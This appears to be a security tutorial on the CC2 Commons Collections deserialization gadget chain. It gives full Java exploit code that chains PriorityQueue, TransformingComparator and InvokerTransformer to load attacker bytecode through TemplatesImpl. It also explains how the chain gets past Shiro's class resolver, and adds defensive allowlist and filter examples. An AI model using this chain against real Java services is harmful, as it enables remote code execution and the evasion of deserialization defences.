Environment
Same as CC4 (Commons Collections 4.x on the classpath).
The CC2 chain can be read as a modification of the CC4 chain: the same PriorityQueue / TransformingComparator entry point, but built so that no Transformer array (ChainedTransformer) appears in the serialized stream.
Writing the exp
The back half of the chain is still CC3's: calling TemplatesImpl.newTransformer() makes getTransletInstance() define the class stored in _bytecodes and instantiate it, which runs its static initializer. So what we need is a way to reach newTransformer() without a ChainedTransformer. A single InvokerTransformer is enough, because transform(obj) invokes the named method on obj by reflection: InvokerTransformer("newTransformer", new Class[]{}, new Object[]{}) applied to a TemplatesImpl object calls templates.newTransformer() directly. The TemplatesImpl setup is therefore the CC3 back half, unchanged:
```java
// Back half (same as CC3): a TemplatesImpl whose _bytecodes holds the malicious class.
// _name must be non-null, otherwise getTransletInstance() returns early without loading anything.
TemplatesImpl templates = new TemplatesImpl();
Class<?> aClass = templates.getClass();
Field nameField = aClass.getDeclaredField("_name");
nameField.setAccessible(true);
nameField.set(templates, "zer0");
Field bytecodesField = aClass.getDeclaredField("_bytecodes");
bytecodesField.setAccessible(true);
// Calc.class is the compiled payload class (it must extend AbstractTranslet, as in CC3);
// its static initializer runs when defineTransletClasses() loads and instantiates it.
byte[] evil = Files.readAllBytes(Paths.get("F:\\code\\CCTest\\src\\main\\java\\Calc.class"));
byte[][] codes = {evil};
bytecodesField.set(templates, codes);
```
The front half of the chain is CC4's front half (PriorityQueue -> TransformingComparator), with the InvokerTransformer plugged in as the comparator's transformer:
```java
// Front half (same entry point as CC4): PriorityQueue.readObject() -> heapify() -> comparator.compare(),
// and TransformingComparator.compare() runs its transformer on both elements before comparing them.
InvokerTransformer<Object, Object> InvokernewTransformer =
        new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});
TransformingComparator transformingComparator = new TransformingComparator<>(InvokernewTransformer);
PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
priorityQueue.add(1);
// Note: the second add() already calls compare(), i.e. InvokerTransformer.transform(1), which looks for
// Integer.newTransformer() and throws. The final exp below avoids this by building the queue with a
// harmless ConstantTransformer and swapping in the InvokerTransformer by reflection afterwards.
priorityQueue.add(2);
```
Final exp
```java
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;

import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class CC2Test {
    public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException {
        // Back half (CC3): TemplatesImpl carrying the payload class in _bytecodes.
        TemplatesImpl templates = new TemplatesImpl();
        Class<?> aClass = templates.getClass();
        Field nameField = aClass.getDeclaredField("_name");
        nameField.setAccessible(true);
        nameField.set(templates, "zer0");
        Field bytecodesField = aClass.getDeclaredField("_bytecodes");
        bytecodesField.setAccessible(true);
        byte[] evil = Files.readAllBytes(Paths.get("F:\\code\\CCTest\\src\\main\\java\\Calc.class"));
        byte[][] codes = {evil};
        bytecodesField.set(templates, codes);

        // The transformer that will call templates.newTransformer() at deserialization time.
        InvokerTransformer<Object, Object> InvokernewTransformer =
                new InvokerTransformer<>("newTransformer", new Class[]{}, new Object[]{});

        // Build the queue with a ConstantTransformer so that the compare() triggered by add() is harmless
        // (both elements transform to 1), then swap the real transformer in by reflection.
        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));
        PriorityQueue priorityQueue = new PriorityQueue<>(transformingComparator);
        priorityQueue.add(templates);
        priorityQueue.add(templates);

        Class<?> c = transformingComparator.getClass();
        Field transformerField = c.getDeclaredField("transformer");
        transformerField.setAccessible(true);
        transformerField.set(transformingComparator, InvokernewTransformer);

        // Write the payload, then read it back: PriorityQueue.readObject() -> heapify() -> compare()
        // -> InvokerTransformer.transform(templates) -> TemplatesImpl.newTransformer() -> Calc loads and runs.
        serialize(priorityQueue);
        unserialization("./2.ser");
    }

    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream out_obj1 = new ObjectOutputStream(new FileOutputStream("./2.ser"));
        out_obj1.writeObject(obj);
        out_obj1.close();
    }

    public static Object unserialization(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream obj2 = new ObjectInputStream(new FileInputStream(Filename));
        Object ois = obj2.readObject();
        return ois;
    }
}
```
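The defensive counterpart to the exp above, as an added example that is not part of the original post: an ObjectInputStream that resolves only an explicit allowlist of classes. Fed the 2.ser file the exp writes, it rejects org.apache.commons.collections4.comparators.TransformingComparator while PriorityQueue's fields are still being read, so readObject() never reaches heapify() and the comparator is never constructed. The allowlist contents (a PriorityQueue of Integers) are an assumption about what the receiving application legitimately expects.

```java
import java.io.*;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

/**
 * Added example (not from the original post): deserialization with a class allowlist.
 * resolveClass() runs before a class is loaded or instantiated, so a rejected class
 * never gets its static initializer, readObject() or readResolve() executed.
 */
public class AllowlistObjectInputStream extends ObjectInputStream {
    private final Set<String> allowed;

    public AllowlistObjectInputStream(InputStream in, Set<String> allowed) throws IOException {
        super(in);
        this.allowed = allowed;
    }

    @Override
    protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
        String name = desc.getName();
        if (!allowed.contains(name)) {
            // IOException subclasses propagate out of readObject() immediately
            // (a ClassNotFoundException would merely be recorded and thrown later).
            throw new InvalidClassException(name, "class not on deserialization allowlist");
        }
        return super.resolveClass(desc);
    }

    /** Reads one object from file; returns null (and prints why) if the stream was rejected. */
    public static Object readAllowed(String file, Set<String> allowed) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new AllowlistObjectInputStream(new FileInputStream(file), allowed)) {
            return ois.readObject();
        } catch (InvalidClassException e) {
            System.out.println("rejected " + file + ": " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Assumption: the application only ever exchanges a PriorityQueue<Integer>.
        // Integer's stream descriptor also names its superclass, hence java.lang.Number.
        Set<String> allowed = new HashSet<>(Arrays.asList(
                "java.util.PriorityQueue", "java.lang.Integer", "java.lang.Number"));

        // "./2.ser" is the payload written by the exp above. Its stream is
        // PriorityQueue -> (comparator field) TransformingComparator -> ..., and the
        // comparator's class name is the first one that fails the allowlist.
        Object o = readAllowed("./2.ser", allowed);
        System.out.println(o == null ? "payload blocked" : "deserialized " + o);
    }
}
```

On JDK 9+ (and 8u121+ via sun.misc) the same policy can be expressed without subclassing, with ObjectInputFilter: `ois.setObjectInputFilter(ObjectInputFilter.Config.createFilter("java.util.PriorityQueue;java.lang.Integer;java.lang.Number;!*"))`. Either way the point is the same: the decision is made on the class name before any gadget code runs, and an allowlist does not need to know the names of TransformingComparator, InvokerTransformer or TemplatesImpl to stop them.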
Summary
What sets CC2 apart from the other chains is that it uses no Transformer array. Avoiding the array matters in environments such as Shiro: its ClassResolvingObjectInputStream overrides resolveClass() and loads classes with ClassLoader.loadClass() rather than Class.forName(), and loadClass() does not accept array class names such as [Lorg.apache.commons.collections.Transformer;. A payload that serializes a Transformer[] (the ChainedTransformer chains) therefore fails to deserialize there, while a chain built from a single InvokerTransformer still goes through.
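The loadClass() limitation described above, as an added example that is not part of the original post. The stream class below mimics a Shiro-style resolver (loadClass() on the descriptor name instead of the default Class.forName()); an Integer[] stands in for Transformer[] so the demo runs without commons-collections on the classpath, and a PriorityQueue with a comparator but no array stands in for the CC2 layout.

```java
import java.io.*;
import java.util.Collections;
import java.util.PriorityQueue;

/**
 * Added example (not from the original post): why a stream carrying an array
 * descriptor fails under a loadClass()-based resolveClass(), while an array-free
 * PriorityQueue/comparator layout, as CC2 uses, deserializes normally.
 */
public class LoadClassResolverDemo {

    /** Resolves every class descriptor with ClassLoader.loadClass(), as Shiro's resolver does. */
    static class LoadClassObjectInputStream extends ObjectInputStream {
        LoadClassObjectInputStream(InputStream in) throws IOException {
            super(in);
        }

        @Override
        protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
            // ClassLoader.loadClass() rejects names in array syntax ("[L...;") and throws
            // ClassNotFoundException; the default resolveClass() uses Class.forName(), which accepts them.
            return LoadClassResolverDemo.class.getClassLoader().loadClass(desc.getName());
        }
    }

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    /** Returns true if the object graph survives a round trip through the loadClass()-based resolver. */
    static boolean deserializesUnderLoadClass(Object o) throws IOException {
        try (ObjectInputStream ois = new LoadClassObjectInputStream(new ByteArrayInputStream(serialize(o)))) {
            ois.readObject();
            return true;
        } catch (ClassNotFoundException e) {
            System.out.println("rejected: " + e.getMessage());
            return false;
        }
    }

    public static void main(String[] args) throws IOException {
        // Carries the array descriptor "[Ljava.lang.Integer;", the same shape a Transformer[] produces.
        Object withArray = new Integer[]{1, 2, 3};

        // PriorityQueue writes its comparator and then its elements one by one: no array descriptor.
        PriorityQueue<Integer> noArray = new PriorityQueue<>(Collections.reverseOrder());
        noArray.add(1);
        noArray.add(2);

        System.out.println("Integer[] under loadClass resolver:     " + deserializesUnderLoadClass(withArray));
        System.out.println("PriorityQueue under loadClass resolver: " + deserializesUnderLoadClass(noArray));
    }
}
```

The first call is rejected with a ClassNotFoundException for `[Ljava.lang.Integer;`, the second succeeds. The same holds for the real classes: a CC6/CC4-style stream containing `[Lorg.apache.commons.collections4.Transformer;` dies at that descriptor, whereas the CC2 stream only ever names PriorityQueue, TransformingComparator, InvokerTransformer and TemplatesImpl, all of which loadClass() resolves without trouble.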
Flow diagram of the chain so far (the trigger path, from the deserializer inward):
PriorityQueue.readObject() -> heapify() -> siftDown() -> TransformingComparator.compare() -> InvokerTransformer.transform() -> TemplatesImpl.newTransformer() -> getTransletInstance() -> defineTransletClasses() -> Calc static initializer